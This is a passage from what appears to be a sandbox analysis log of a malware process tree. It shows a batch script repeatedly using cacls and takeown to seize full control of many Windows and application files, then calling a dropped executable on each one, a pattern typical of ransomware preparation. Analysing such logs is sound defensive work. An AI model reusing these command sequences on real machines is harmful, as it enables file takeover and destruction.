- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4116
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:4852
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "wab.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:4984
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:5008
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4956
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4728
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:4924
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:4884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2768
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "background.png" -nobanner
    3⤵
    PID:4032
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "background.png" -nobanner
      4⤵
      Executes dropped EXE
      PID:3960
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3356
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json""
  2⤵
  PID:5116
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json" /E /G Admin:F /C
    3⤵
    PID:4284
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5052
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "utc.tracing.json" -nobanner
    3⤵
    PID:4048
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "utc.tracing.json" -nobanner
      4⤵
      Executes dropped EXE
      PID:4152
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:264
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd""
  2⤵
  PID:4468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd" /E /G Admin:F /C
    3⤵
    PID:4052
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Templates\SettingsLocationTemplate.xsd"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
    3⤵
    PID:4772
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "SettingsLocationTemplate.xsd" -nobanner
      4⤵
      Executes dropped EXE
      PID:248
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5060
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab""
  2⤵
  PID:904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab" /E /G Admin:F /C
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\cab1.cab"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "cab1.cab" -nobanner
    3⤵
    PID:4244
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "cab1.cab" -nobanner
      4⤵
      PID:4368
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4512
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:4128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5012
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:2232
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:4132
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4112
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:4740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:4124
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:4460
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      PID:4920
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4568
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
  2⤵
  PID:4564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
    3⤵
    PID:4728
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
    3⤵
    - Modifies file permissions
    PID:4964
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "KnownGameList.bin" -nobanner
    3⤵
    PID:4868
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "KnownGameList.bin" -nobanner
      4⤵
      PID:4732
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4804
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H""
  2⤵
  PID:4840
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4180
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:188
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "Identity-H" -nobanner
      4⤵
      PID:4348
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4916
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui""
  2⤵
  PID:5104
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:5084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:276
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:5080
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:4900
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3148
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""
  2⤵
  PID:4532
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C
    3⤵
    PID:4772
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "WinMail.exe" -nobanner
    3⤵
    PID:4160
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "WinMail.exe" -nobanner
      4⤵
      PID:4468
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1764
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:4448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:4304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4760
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:3224
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      PID:4236
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:5000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:2192
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:4124
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Program Files (x86)\Windows Mail\wabmig.exe""
  2⤵
  PID:4944
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:4852
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:4928
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:4728
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4964
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png""
  2⤵
  PID:4756
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png" /E /G Admin:F /C
    3⤵
    PID:5056
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "superbar.png" -nobanner
    3⤵
    PID:2976
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "superbar.png" -nobanner
      4⤵
      PID:4716
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4180
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json""
  2⤵
  PID:4948
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json" /E /G Admin:F /C
    3⤵
    PID:5096
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "utc.cert.json" -nobanner
    3⤵
    PID:4764
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "utc.cert.json" -nobanner
      4⤵
      PID:5084
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:276
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1""
  2⤵
  PID:5116
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1" /E /G Admin:F /C
    3⤵
    PID:2256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\UEV\Scripts\RegisterInboxTemplates.ps1"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4416
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
    3⤵
    PID:248
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "RegisterInboxTemplates.ps1" -nobanner
      4⤵
      PID:4772
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:252
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin""
  2⤵
  PID:5112
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin" /E /G Admin:F /C
    3⤵
    PID:4384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\TempState\TileCache_100_0_Header.bin"
    3⤵
    - Modifies file permissions
    PID:260
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
    3⤵
    PID:4176
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "TileCache_100_0_Header.bin" -nobanner
      4⤵
      PID:4232
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2188
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb""
  2⤵
  PID:4584
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb" /E /G Admin:F /C
    3⤵
    PID:4448
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\TileDataLayer\Database\vedatamodel.edb"
    3⤵
    - Modifies file permissions
    PID:4288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "vedatamodel.edb" -nobanner
    3⤵
    PID:4128
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "vedatamodel.edb" -nobanner
      4⤵
      PID:4936
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4856
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab""
  2⤵
  PID:4988
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab" /E /G Admin:F /C
    3⤵
    PID:5000
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\Data1.cab"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "Data1.cab" -nobanner
    3⤵
    PID:4740
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "Data1.cab" -nobanner
      4⤵
      PID:4908
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4488
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json""
  2⤵
  PID:4956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json" /E /G Admin:F /C
    3⤵
    PID:4280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4572
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner
    3⤵
    PID:4564
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "telemetry.ASM-WindowsDefault.json" -nobanner
      4⤵
      PID:4820
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3356
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:3960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:4860
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4868
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "device.png" -nobanner
    3⤵
    PID:4792
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "device.png" -nobanner
      4⤵
      PID:4892
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3756
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\Diagnosis\osver.txt""
  2⤵
  PID:4764
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\osver.txt" /E /G Admin:F /C
    3⤵
    PID:4784
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\osver.txt"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "osver.txt" -nobanner
    3⤵
    PID:2256
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "osver.txt" -nobanner
      4⤵
      PID:4284
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5060
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6erQoYez.bat" "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json""
  2⤵
  PID:248
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json" /E /G Admin:F /C
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Diagnosis\DownloadedSettings\utc.app.json"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4468
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c 7hL7bF1m.exe -accepteula "utc.app.json" -nobanner
    3⤵
    PID:4052
  - - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
      7hL7bF1m.exe -accepteula "utc.app.json" -nobanner
      4⤵
      PID:4692
- - C:\Users\Admin\AppData\Local\Temp\7hL7bF1m.exe
    7hL7bF1m.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4760
- C:\Windows\SysWOW64\cmd.exe
